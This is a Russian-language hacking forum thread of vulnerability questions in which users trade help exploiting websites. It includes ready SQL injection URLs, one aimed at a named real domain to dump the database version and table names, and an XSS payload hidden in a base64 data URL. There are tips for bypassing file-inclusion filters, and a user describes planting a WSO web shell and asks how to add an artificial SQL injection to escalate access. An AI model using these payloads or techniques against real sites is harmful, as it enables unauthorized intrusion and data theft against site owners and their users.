Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    я имел ввиду админку сайта
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    _________________________
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    если админ граммотный, то админку так можно спрятать что никогда ненайдешь ее.
     
    _________________________
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    "грамотный" //забавно вышло ))

    Дело не в грамотности, а в удобстве использования...

    Сомневаюсь что у ТС именно этот случай.
     
    _________________________
  5. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Ребят, не могу скулю джумлувскую раскрутить
    имеется url
    компонент com_fireboard
    http://forum.antichat.ru/showpost.php?p=1416107&postcount=148
    этот метод мягко говоря не помогает
    как и что в этой ситуации делать не знаю
     
  6. mr.KREGI

    mr.KREGI New Member

    Joined:
    22 May 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Добрый час, есть url следующего вида http://site.ru/?p=3
    если подставить несуществующий id то будет ошибка (например 9993)
    Warning: include(glob/ref9993_+.php) [function.include]: failed to open stream: No such file or directory in /home/u*****/siteru/www/global.php on line 26
    как раскрутить тут php inj?
    получается добавляются символы до и после...
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    для начало чтоб задовать вопросы необходима ознакомиться со статьями по соотвецтвующему вопросу, а только потом уже задовать, также каждый случай уникален, и если вы хотите, чтоб вам помогли то раскрывайте урл полностью, по данному вопросу прочтите вот эту статейку https://forum.antichat.ru/thread12123.html
     
    _________________________
  8. mr.KREGI

    mr.KREGI New Member

    Joined:
    22 May 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ок, спасибо за ответ, статьи читал и опыт с php inj есть, в моем случае получается локальный инклуд, проблема состоит в том что подставляются символы во время инклуда... не знаю как решить.
    url раскрывать в паблик не хочется, могу написать в ЛС ,если поможете.
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Пробуйте вариант с null байтом или усечением пути!
     
    #20449 cat1vo, 24 May 2012
    Last edited: 24 May 2012
  10. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    Ребят,такая проблема,подскажите,плз...
    Есть сайт,висит на Windows,бд MSSQL...также на нем есть старый блог на вордпресс с MySQL и неприкрытым phpmyadmin...через блог залил шелл WSO,оказался внутри сервака,но под гостем...exe запускать не могу,но файлы сайта(asp) изменять могу...нашел данные от MSSQL,но по ним не подрубается...
    Вопрос: что нужно добавить к примеру в 404.asp,чтобы создать искусственную sql-иньецию(возможно у MSSQL больше прав)?
     
  11. Spoos

    Spoos Banned

    Joined:
    17 Nov 2011
    Messages:
    24
    Likes Received:
    6
    Reputations:
    2
    вроде нaшел скулю пишет ошибка
    как раскрутить?
     
  12. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    А как крутил ?
     
  13. Spoos

    Spoos Banned

    Joined:
    17 Nov 2011
    Messages:
    24
    Likes Received:
    6
    Reputations:
    2
    http://admin.site.com/goods/?where=dsffds''
     
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://admin.site.com//goods/?where=1)+limit+1,1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,user(),database(),version()),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+
     
    #20454 cat1vo, 24 May 2012
    Last edited: 24 May 2012
    1 person likes this.
  15. Bamba

    Bamba New Member

    Joined:
    9 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Можно получить права админа mysql с помощью phpmyadmin 2.11.11.3
    Учетка юзера в базе есть, к file нет привилегий.
     
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    нашел по сути банальную xss в input.
    проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
    знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
    где то проскакивал способ через eval, но я не осилил.
    + ограничение на 100 символов.
     
    #20456 justonline, 25 May 2012
    Last edited: 25 May 2012
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    PHP:
    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    Где
    это <script>alert('XSS')</script>.
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    работать дальше тега input нельзя. и больше 100 символов писать нельзя :)
    на сайте закрыто все, что можно из xss... но одно поле забыли...и то сделали фильтрацию // только для того, что бы не было нагромождений и показывало обычный урл. Они даааже не подозревали, сколько это вызовет у меня негодований :(

    энибоди кен хелп ми?
     
    #20458 justonline, 25 May 2012
    Last edited: 25 May 2012
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопросец

    нормально вывело версию
    PHP:
    http://www.chronopuncture.info/vr/index.php?md=details&id=108093%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
    пытаюсь к примеру вывести таблицы

    PHP:
    http://www.chronopuncture.info/vr/index.php?md=details&id=108093'+or+1+group+by+concat((select+concat_ws(0x3a,table_schema,table_name,table_rows)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    уже переадресация, чёзаа байда, как боротся?
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    фильтруется from
     
    _________________________
Thread Status:
Not open for further replies.